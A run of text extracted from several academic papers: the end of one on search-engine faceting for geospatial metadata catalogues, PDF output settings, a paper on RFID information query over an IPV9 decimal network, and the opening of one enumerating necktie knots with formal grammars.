feature useful for searching the WorldMap metadata catalogue is faceted search. Faceting is the arrangement of search results in categories based on indexed terms. This capability makes it possible, for example to provide an immediate indication of the number of times that common keywords are contained in different metadata documents. A typical use case is with metadata categories, keywords and regions. Thanks to facets, the user interface of an SDI catalogue can display counts for documents by category, keyword or region (Fig. 5). Search engines can also support temporal and spatial faceting, two features that are extremely useful for browsing large collections of geospatial metadata. Temporal faceting can display the number of metadata documents by date range as a kind of histogram. Spatial faceting can provide a spatial surface representing the distribution of layers or features across an area of interest. In Fig. 6, a heatmap is generated by spatial faceting which shows the distribution of layers in the WorldMap SDI for a given geographic region (Fig. 6). Figure 6 Spatial faceting enables heatmaps showing the distribution of the SDI layers in the space. Full-size DOI: 10.7717/peerj-cs.152/fig-6 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 11/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-6 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Other features In addition, it is possible to use regular expressions, wildcard search and fuzzy search to provide results for a given term and its common variations. It is also possible to support boolean queries: a user is able to search results using terms and boolean operators such as AND, OR, NOT and hit highlighting can provide immediate search term suggestions to the user searching a text string in metadata. CONCLUSION While the CSW 3.0.0 standard provides improvements to address mass market search/ discovery, the benefits of search engine implementations combined with broad interoperability of the CSW standard presents a great opportunity to enhance the CSW Figure 7 pycsw interaction with the search engine using an application profile and using a basic profile (when pycsw will provide direct support for the search engine). Full-size DOI: 10.7717/peerj-cs.152/fig-7 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 12/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-7 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ standard. The authors hope that such an approach eventually becomes formalized as a CSW Application Profile or Best Practice in order to achieve maximum benefit and adoption in SDI activities. This will allow CSW implementations to make better use of search engine methodologies for improving the user search experience in SDI workflows. In addition, pycsw is planning for dedicated Elasticsearch/Solr support as part of a future release to enable the use of search engines as backend stores to the CSW standard. This is a different approach from using an Application Profile or Best Practice, as it directly interacts with data in the search engine rather than in the RDBMS (Fig. 7). The authors would like to share this work with the OGC CSW community in support of the evolution of the CSW specification. Given recent developments on the OGC WFS 3.0 standard (RESTful design patterns, JSON, etc.), there is an opportunity for CSW to evolve in alignment with WFS 3.0 in support of the principles of the W3C Spatial Data on the Web Best Practices (Group, 2017) in a manner similar to the work presented in this paper. ACKNOWLEDGEMENTS The authors thank all the contributors to the Hypermap and GeoNode platform source code, particularly: Wayner Barrios, Matt Bertrand, Simone Dalmasso, Alessio Fabiani, Jorge Martı́nez Gómez, Wendy Guan, Jeffrey Johnson, Devika Kakkar, Jude Mwenda, Ariel Núñez, Luis Pallares, David Smiley, Charles Thao, Angelos Tzotsos, Mingda Zhang. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work is partially funded by the U.S. National Endowment for the Humanities, Digital Humanities Implementation Grant #HK5009113 and the U.S. National Science Foundation Industry-University Cooperative Research Centers Program (IUCRC) grant for the Spatiotemporal Thinking, Computing, and Applications Center (STC) #1338914, and by Harvard University. Grant administration was supported by Harvard’s Institute for Quantitative Social Science. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: U.S. National Endowment for the Humanities, Digital Humanities Implementation: #HK5009113. U.S. National Science Foundation Industry-University Cooperative Research Centers Program (IUCRC). Spatiotemporal Thinking, Computing, and Applications Center (STC): #1338914. Harvard University. Harvard’s Institute for Quantitative Social Science. Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 13/15 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Competing Interests The authors declare that they have no competing interests. Author Contributions � Paolo Corti conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Athanasios Tom Kralidis performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Benjamin Lewis performed the experiments, analyzed the data, contributed reagents/ materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Hypermap Registry: https://github.com/cga-harvard/Hypermap-Registry REFERENCES Bone C, Ager A, Bunzel K, Tierney L. 2016. A geospatial search engine for discovering multi- format geospatial data across the web. International Journal of Digital Earth 9(1):47–62 DOI 10.1080/17538947.2014.966164. Chen N, Chen Z, Hu C, Di L. 2011. A capability matching and ontology reasoning method for high precision OGC web service discovery. International Journal of Digital Earth 4(6):449–470 DOI 10.1080/17538947.2011.553688. Corti P, Lewis B. 2017. Making temporal search more central in spatial data infrastructures. In: ISPRS Annals of Photogrammetry, Remote Sensing and Spatial Information Sciences. Germany: Copernicus Publications, 93–95. Goodchild MF, Fu P, Rich P. 2007. Sharing geographic information: an assessment of the geospatial one-stop. Annals of the Association of American Geographers 97(2):250–266 DOI 10.1111/j.1467-8306.2007.00534.x. Groot R, McLaughlin JD. 2000. Geospatial Data Infrastructure: Concepts, Cases, and Good Practice. Oxford: Oxford University Press. Group OWW. 2017. Spatial data on the web best practices. Available at https://www.w3.org/TR/ sdw-bp/ (accessed 12 March 2018). Guan WW, Bol PK, Lewis BG, Bertrand M, Berman ML, Blossom JC. 2012. Worldmap—a geospatial framework for collaborative research. Annals of GIS 18(2):121–134 DOI 10.1080/19475683.2012.668559. ISO 19115-1: 2014. 2014. Geographic Information—Metadata—Part 1: Fundamentals. Geneva: International Standards Organisation. Kakkar D, Lewis B. 2017. Building a billion spatio-temporal object search and visualization platform. In: ISPRS Annals of Photogrammetry, Remote Sensing and Spatial Information Sciences. Germany: Copernicus Publications, 97–100. Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 14/15 https://github.com/cga-harvard/Hypermap-Registry http://dx.doi.org/10.1080/17538947.2014.966164 http://dx.doi.org/10.1080/17538947.2011.553688 http://dx.doi.org/10.1111/j.1467-8306.2007.00534.x https://www.w3.org/TR/sdw-bp/ https://www.w3.org/TR/sdw-bp/ http://dx.doi.org/10.1080/19475683.2012.668559 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Kakkar D, Lewis B, Smiley D, Nunez A. 2017. The billion object platform (bop): a system to lower barriers to support big, streaming, spatio-temporal data sources. Free and Open Source Software for Geospatial (FOSS4G) Conference Proceedings 17:15 DOI 10.7275/R5ST7N0G. Kralidis AT. 2009. Geospatial web services: the evolution of geospatial data infrastructure. In: The Geospatial Web. London: Springer, 223–228. Li W, Yang C, Yang C. 2010. An active crawler for discovering geospatial web services and their distribution pattern—a case study of OGC web map service. International Journal of Geographical Information Science 24(8):1127–1147 DOI 10.1080/13658810903514172. Masó J, Pons X, Zabala A. 2012. Tuning the second-generation SDI: theoretical aspects and real use cases. International Journal of Geographical Information Science 26(6):983–1014 DOI 10.1080/13658816.2011.620570. Nebert DD. 2004. Developing Spatial Data Infrastructures: the SDI cookbook. Global Spatial Data Infrastructure (GSDI) Association. Available at http://gsdiassociation.org/images/publications/ cookbooks/SDI_Cookbook_GSDI_2004_ver2.pdf. Nebert D, Whiteside A, Vretanos P. 2005. OGC catalogue services specification. Open Geospatial Consortium Inc. Available at https://portal.opengeospatial.org/files/?artifact_id=20555. Nogueras-Iso J, Zarazaga-Soria FJ, Muro-Medrano PR. 2005. Geographic Information Metadata for Spatial Data Infrastructures: Resources, Interoperability and Information Retrieval. Berlin, Heidelberg: Springer Berlin Heidelberg. Open Geospatial Consortium. 2016. Catalogue service. Available at http://www.opengeospatial. org/standards/cat/ (accessed 12 March 2018). Rajabifard A, Kalantari M, Binns A. 2009. SDI and metadata entry and updating tools. In: SDI Convergence. Available at https://minerva-access.unimelb.edu.au/bitstream/handle/ 11343/26084/115448_SDIandMetadataEntryandUpdatingtool.pdf. Smiley D, Pugh E, Parisa K, Mitchell M. 2015. Apache Solr Enterprise Search Server. Birmingham: Packt Publishing Ltd. Tsinaraki C, Schade S. 2016. Big data—a step change for SDI? International Journal 11:9–19. Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 15/15 http://dx.doi.org/10.7275/R5ST7N0G http://dx.doi.org/10.1080/13658810903514172 http://dx.doi.org/10.1080/13658816.2011.620570 http://gsdiassociation.org/images/publications/cookbooks/SDI_Cookbook_GSDI_2004_ver2.pdf http://gsdiassociation.org/images/publications/cookbooks/SDI_Cookbook_GSDI_2004_ver2.pdf https://portal.opengeospatial.org/files/?artifact_id=20555 http://www.opengeospatial.org/standards/cat/ http://www.opengeospatial.org/standards/cat/ https://minerva-access.unimelb.edu.au/bitstream/handle/11343/26084/115448_SDIandMetadataEntryandUpdatingtool.pdf https://minerva-access.unimelb.edu.au/bitstream/handle/11343/26084/115448_SDIandMetadataEntryandUpdatingtool.pdf http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Enhancing discovery in spatial data infrastructures using a search engine Introduction Background Results and Discussion Conclusion flink5 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_2iy7olcp6bgspd4hfeinespmbm ---- None work_2lytvedz4zhc3ne5onhq7issre ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 DOI: 10.21307/ijanmc-2019-074 74 On the RFID Information Query Technology Based on IPV9 Li Guiping The School of Computer Science and Engineering Xi’an Technological University, Xi’an, China E-mail: 15693685@qq.com Xue Lei Shandong University of Science and Technology 223 Daizong Street, Tai’an City Shandong Province, 271000 E-mail: Shirleyxue06@163.com Abstract—Since coding format of RF label is inconsistent with the protocol format of the information server's network, a design scheme of network architecture is proposed to achieve the connectivity between the decimal network based on IPV9 and the Internet network based on IPV4/IPV6. And also, two ways of information’s Query and connectivity based on D-ONS and direct routing between the decimal network is devised by using the expert modules. The experiment results shows that both the two ways can provide efficient service of RFID Information Query . Keywords-IPV9 ; RFID; Domain Transformation; Information Query I. INTRODUCTION With the development of radio frequency technology, product-related information can be quickly obtained by the readers if RF tags are assigned to each product. Recently, people have began to adopt IPV6 and even IPV9 protocol formats for RF tag coding since IPV4 address space has been used up. If the server storing product-related information is stored in an IPV4 or IPV6 network, how to query RF information across the network should be solved. This paper mainly studies the RF information query process of interconnection between decimal network and Internet network and the domain name conversion rules obtained by decimal network query server. II. IPV9 IPV9, short for decimal network and the new generation of Internet, is the result of China's independent innovation of core technologies which has IPV9 protocol, IPV9 addressing, digital domain name system and other core technologies are adopted with original and independent intellectual property rights. Full digital text is used to represent the IP address. The address space is larger than that of IPV4 or IPV6. The 1st-41th level of the address space is expressed as binary 256 bits, while using the decimal 256 bits to express the 42th. III. RFID Radio Frequency Identification(RFID) is a non- contact automatic recognition technology. It communicates with other object using reflected power. It can automatically identify target objects and obtain relevant data through radio frequency signals, which can quickly track items and exchange data. And also, the identify ability need no one to participate in. A typical RFID system consists of electronic tag, reader (including antenna) and application system. Further, electronic tags are the data carrier of RFID system which consists of a label antenna and a label chip. It can receive the reader's electromagnetic field modulation signal and return the response signal to achieve the label identification code and memory data read or write operations. The reader is used to receive host commands and send the data stored in the sensor back to the host by the wired or wireless way. It contains a controller and an antenna. If the reading distance is long, the antenna will stand alone. The terminal computer of the application system interacting with the RFID system transmits the work instructions issued by the MIS application system. It makes electronic tags and readers be coordination through middleware, processes all data collected by RFID system, and carries out calculation, storage and data transmission. The process can be described as Fig.1and Fig.2. Figure 1. The requery process of information based on RFID Timin g Data Energy RFID antenna RFID electronic label Computer control network RFID reader and writer International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 75 Figure 2. Electronic tags The operating principle of RFID system is to receive the radio frequency signal emitted by the reader when an item with an electronic tag enters the radiation range of the reader antenna. The passive tag sends data stored in the tag chip using the energy generated by the induced current, while active electronic tags can send data stored in the tag chip, actively. Generally, readers are equipped with middleware of certain functions. Hence, it can read data, decode and directly carry out simple data processing, then send to the application system. The application system judges the legitimacy of electronic tags according to the logic operation, and carries out corresponding processing and control for different Settings, thus realizing the basic functions of RFID system. IV. NETWORK ARCHITECTURE BASED ON IPV9 RFID INFORMATION QUERY TECHNOLOGY RFID information query technology can provide people with the function of inquiring information related to products through the RFID tag. The information related to RFID tags is stored on the information server and is generally maintained by the manufacturer of the product. In view of the actual use of the Internet, it is necessary to design a network architecture for interconnection between the decimal network and the Internet, which meets certain conditions. On this basis, RFID tag information query service is implemented. The overall network architecture design scheme is as follows. A. Overall design of network architecture The architecture of RFID tag information query service on Internet is based on IPV4 and IPV6 protocols. Routing adopts IPV4 and IPV6 protocols, and resource positioning is completed by SNS and PSNS. The architecture of electronic tag information location query service based on decimal network is a network architecture based on IPV9 protocol, including the following two ways. (1) Using the routing to locate the information server directly. The route uses the IPV9 protocol without the DNS resolver. (2) Adopting the parsing service of the application layer with U-code Resolution Server. DONS uses host domain name resolution to provide IPV4, IPV6 and IPV9 addresses, while using IPV4, IPV6 and IPV9 protocols as routing protocols .Resource positioning is done by D-ONS. The network architecture of RFID tag information query service mainly includes the decimal network information query service technology system and the Internet information query service technology system. Specifically, the decimal network architecture includes middleware, information server, D-ONS server, DDNS and IPV9 direct router. Internet architecture includes SNS server, PSNS server, information server, .cn root DNS server, DDNS server and.cn root. DNS server through the domain name resolution forwarding digital domain name and English domain name connectivity. B. The key module of network architecture -- expert module The expert module is the middleware used between the decimal network and the Internet to realize the interconnection between the two, and the data exchange format between the two is XML. It includes the following interfaces.  RF information query of Decimal network and architecture of discovery technology input product and service digital identifiers to query the Internet RF information, through the expert module, discovery technology architecture request to return the product and service specific information storage address or URI.  RF information query of Internet and architecture of discovery technology input product and service digital identifiers to query the Decimal network RF information, through the expert module, discovery technology architecture request to return the product and service specific information storage address or URI.  RF information query of Decimal network and architecture of discovery technology input product and service digital identifiers to query the Internet RF information, through the expert module, discovery technology architecture request to return the product and service specific information. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 76  RF information query of Internet and architecture of discovery technology input product and service digital identifiers to query the Decimal network RF information, through the expert module, discovery technology architecture request to return the product and service specific information. V. RESEARCH ON INFORMATION QUERY PROCESS Based on the above network architecture, the implementation of RFID tag information query service based on IPV9 can be designed in two ways: D-ONS based decimal network and Internet network information query and direct routing mode of exchange visits between decimal network information query service system and Internet information query service system. A. Exchange query process Between D-ons-based decimal network and Internet network information query service system When the related product information is stored in the Internet information server and label coding format is using able format, the decimal network based on D- ONS accessing the information query process of Internet mainly involves the following several key modules: decimal network query server, decimal network, expert module, information server middleware, the SNS and PSNS server. The access relationship between these modules is shown in figure 3. Decimal network label readers Require server Expert modul middleware SNS server PSNS server Information server a) b) c) d) i) e) j) f) g) h) identifiers of product and service Domain of product and server standard identifiers and identifiers of product and service Domain of product and server NAPTR resource record Address of information server conneccti on Internet Identifiers of product and service Figure 3. The process of accessing the Internet on a D-ONS- based decimal network. 1) The access process can be described as follows a) Using RFID readers to read IPV9 identifiers and product and service identifiers from electronic tags. b) Submitting the read identifiers and product and service identifiers to the query server in the decimal network. c) Calling decimal network query server and Internet interface expert modules to access the Internet. d) The Internet interface of the expert module accesses the middleware of the Internet architecture through standard identifiers and identifiers of product and service . e) The service middleware converts the standard identifier to the domain name format and sends it to the SNS server to request the resolution service. f) The SNS server returns the conversion rules of PSID domain name by the form of regular expressions to the service middleware. g) Service middleware issues query request to PSNS server based on PSID domain name. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 77 h) PSNS returns the NAPTR record containing the product and service information service or PSDS address. i) The service middleware returns the results to the expert module, whose decimal network interface returns service of the product and information or NAPTR records of PSDS address to the query server. j) Querying the server request and finally getting the product information returned by the information server. When product-related information is stored in the information server of the decimal network, and the label encoding format is IPV4 or IPV6 format, the D- ONS based decimal network needs to be accessed through the Internet network. The access process involves the key modules: Internet query server, expert module, D-ons server, information server. The access process is shown in figure 4. decimal network D-ONS resolve server D-ONS server Information server Domain resolve server Expert modul label reader Requery server a) b) c) f) d) e) g) tandard id code and domain name onversion Network distributed query control product and service domain name Address of information server identifiers of product and service. identifiers of product and service. Internet Figure 4. The process of Internet accessing to a decimal network based on the d-ons protocol. 2) The access process can be described as follows a) Using Rf readers to read product and service identifiers from electronic tags encoded in IPV4 and IPV6 formats. b) Submitting the identifier and identifiers of product and service to the query server. c) Calling by the query server the expert module's decimal network interface between the Internet network and the decimal network. d) The decimal network interface of the expert module sends a request to the D-ONS server of the decimal network architecture to inquire the information of the server domain name where the product information is stored through the identifier and product and service. e) The D-ONS server receives the request and returns information of the product and service domain name. f) The information server of decimal network queries the Internet server for product information. g) The query server returns product information. B. Directly routing the decimal network information query service and the Internet information query service system exchange query process The process of mutual visits between the system of decimal network information query service with direct routing and the Internet information query service system are shown in figure 5 and figure 6. It involve the query server, expert module, middleware, information server, SNS server and PSNS server. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 78 The interconnection of IPV4, IPV6 and IPV9 can realize the mutual visits between IPV4, IPV6 and IPV9 through protocol conversion. Specifically, a protocol conversion server needs to be set up, and all data packets are converted into specified protocols to satisfy the data communication between different protocols. Decimal network label reader Requery server Internet middleware SNS server PSNS server Information server a) b) c) j) d) i) e) k) f) g) h) identifier of product and service identifier of product and service Domain of product and server NAPTR resource record Address of information server connection Expert modul Protocl transerformation IPV9 IPV4/ IPV6 Figure 5. The accessing process of Direct routing of decimal network to the Internet 1) The process of searching the product information stored in the Internet and encoding format used IPV9 can be described as follows. RF reader reads IPV9 identifier and the identifier of product and service from electronic tag. Submitting identifiers of product and service to the query server on a decimal network. a) The query server calls the expert module's Internet interface. b) The Internet interface of the expert module accesses the middleware of the Internet architecture through identifiers of product and service. c) Internet middleware delivers product and service domain names to the SNS server. d) SNS server returns the middle results to the middleware . e) The middleware returns the results to the expert module. f) The expert module requests product information from the information server according to the address information inquired. g) The expert module returns the product information to the query server of decimal network to complete the process of product information query. In the direct routing mode, if the product's RF tags are encoded in IPV4 and IPV6 protocols, and the product-related information is stored in the server of the decimal network, the query process needs to involve IPV9 router, information server, expert module and query server. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 79 Decimal network IPV9 direct routing server Information server Internet label reader Requery server a) b) c) f) e)identifier of product and service Transformation ruler of domain of product and server identifier of product and service Non-decimal product identifier Expert modul Protocol transformation h) IPV9 IPV4/ IPV6 Figure 6. The access process from Internet to decimal network under the direct routing 2) The access process can be described as follows. a) RF readers read IPV4 or IPV6 identifiers and identifiers of product and service from electronic tags. b) Submitting identifiers of product and service to the query server over the Internet network. c) The query server calls the expert module's decimal network interface. d) The expert module of decimal network interface accesses the IPV9 router for the decimal network architecture through identifiers of product and service . e) The PV9 router converts the product and service digital identifiers to the IP address of the product information server. f) The IPV9 router accesses the information server and requests product information. g) The IPV9 router returns product information to the Internet user via the expert module. In the above process, the expert module between the two network systems realizes the translation and conversion of the data formats of the two systems. The protocol conversion module can translate the IP address, message and header. VI. CONCLUSION This paper proposes two kinds of information query exchange services between decimal network and Internet to solve the problem that the encoding format of radio frequency tag is not uniform with the network protocol format of product information server. Experimental results show that both methods can provide efficient rf information query service. REFERENCES [1] SJ/T CCCCC-CCCC Digital identity format specification for information processing products and services. [2] SJ/T DDDDD-DDDD Rf-based domain name specification for products and services [3] IETF RFC 1034 Domain names-concepts and facilities [4] IETF RFC 1035 Domain names-implementation and specification [5] IETF RFC 1347 TCP and UDP with Bigger Addresses [6] IETF RFC 1561 ISO Use of ISO CLNP in TUBA Environments [7] IETF RFC 1606 A Historical Perspective On The Usage Of IP Version 9 [8] IETF RFC 1607 A VIEW FROM THE 21ST CENTURY [9] IETF RFC 1700 - Assigned Numbers） work_2mdy3t4xane2hdgqagdmp6jlju ---- More ties than we thought Submitted 13 February 2015 Accepted 6 May 2015 Published 27 May 2015 Corresponding author Mikael Vejdemo-Johansson, mvj@kth.se Academic editor Anne Bergeron Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.2 Copyright 2015 Hirsch et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS More ties than we thought Dan Hirsch1, Ingemar Markström2, Meredith L. Patterson1, Anders Sandberg3 and Mikael Vejdemo-Johansson2 ,4 ,5 1 Upstanding Hackers Inc. 2 KTH Royal Institute of Technology, Stockholm, Sweden 3 Oxford University, UK 4 Jožef Štefan Institute, Ljubljana, Slovenia 5 Institute for Mathematics and its Applications, Minneapolis, USA ABSTRACT We extend the existing enumeration of neck tie-knots to include tie-knots with a textured front, tied with the narrow end of a tie. These tie-knots have gained popularity in recent years, based on reconstructions of a costume detail from The Matrix Reloaded, and are explicitly ruled out in the enumeration by Fink & Mao (2000). We show that the relaxed tie-knot description language that comprehensively describes these extended tie-knot classes is context free. It has a regular sub-language that covers all the knots that originally inspired the work. From the full language, we enumerate 266,682 distinct tie-knots that seem tie-able with a normal neck-tie. Out of these 266,682, we also enumerate 24,882 tie-knots that belong to the regular sub-language. Subjects Algorithms and Analysis of Algorithms, Computational Linguistics, Theory and Formal Methods Keywords Necktie knots, Formal language, Automata, Chomsky hierarchy, Generating functions INTRODUCTION There are several different ways to tie a necktie (Fig. 1). Classically, knots such as the four-in-hand, the half windsor and the full windsor have commonly been taught to new tie-wearers. In a sequence of papers and a book, Fink & Mao (2001), Fink & Mao (2000) and Fink & Mao (1999) defined a formal language for describing tie-knots, encoding the topology and geometry of the knot tying process into the formal language, and then used this language to enumerate all tie-knots that could reasonably be tied with a normal-sized necktie. The enumeration of Fink and Mao crucially depends on dictating a particular finishing sequence for tie-knots: a finishing sequence that forces the front of the knot—the façade—to be a flat stretch of fabric. With this assumption in place, Fink and Mao produce a list of 85 distinct tie-knots, and determine several novel knots that extend the previously commonly known list of tie-knots. In recent years, however, interest has been growing for a new approach to tie-knots. In The matrix reloaded (Wachowski et al., 2003), the character of “The Merovingian” has a sequence of particularly fancy tie-knots. Attempts by fans of the movie to recreate the tie-knots from the Merovingian have led to a collection of new tie-knot inventions, all of which rely on tying the tie with the thin end of the tie—the thin blade. Doing this allows for How to cite this article Hirsch et al. (2015), More ties than we thought. PeerJ Comput. Sci. 1:e2; DOI 10.7717/peerj-cs.2 mailto:mvj@kth.se https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.2 http://dx.doi.org/10.7717/peerj-cs.2 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 Figure 1 Some specific tie-knot examples. Top row from left: the Trinity (L-110.4), the Eldredge (L-373.2) and the Balthus (C-63.0, the largest knot listed by Fink and Mao). Bottom row randomly drawn knots. From left: L-81.0, L-625.0, R-353.0. a knot with textures or stylings of the front of the knot, producing symmetric and pleasing patterns. Knorr (2010) gives the history of the development of novel tie-knots. It starts out in 2003 when the edeity knot is published as a PDF tutorial. Over the subsequent 7 years, more and more enthusiasts involve themselves, publish new approximations of the Merovingian tie-knot as PDF files or YouTube videos. By 2009, the new tie-knots are featured on the website Lifehacker and go viral. In this paper, we present a radical simplification of the formal language proposed by Fink and Mao, together with an analysis of the asymptotic complexity class of the tie-knots language. We produce a novel enumeration of necktie-knots tied with the thin blade, and compare it to the results of Fink and Mao. Formal languages The work in this paper relies heavily on the language of formal languages, as used in theoretical computer science and in mathematical linguistics. For a comprehensive reference, we recommend the textbook by Sipser (2006). Recall that given a finite set L called an alphabet, the set of all sequences of any length of items drawn (with replacement) from L is denoted by L∗. A formal language on the alphabet L is some subset A of L∗. The complexity of the automaton required to determine whether a sequence is an element of A places A in one of several complexity classes. Languages that are described by finite state automata are regular; languages that require a pushdown automaton are context free; languages that require a linear bounded automaton are context sensitive and languages that require a full Turing machine to determine are called recursively enumerable. This sequence builds an increasing hierarchy of expressibility and computational complexity for syntactic rules for strings of some arbitrary sort of tokens. Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 2/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 L R C T W Thin blade Broad blade BA Figure 2 Left/Center/Right. The parts of a necktie, and the division of the wearer’s torso with the regions (Left, Center Right) and the winding directions (Turnwise, Widdershins) marked out for reference. One way to describe a language is to give a grammar—a set of production rules that decompose some form of abstract tokens into sequences of abstract or concrete tokens, ending with a sequence of elements in some alphabet. The standard notation for such grammars is the Backus–Naur form, which uses ::= to denote the production rules and ⟨some name⟩ to denote 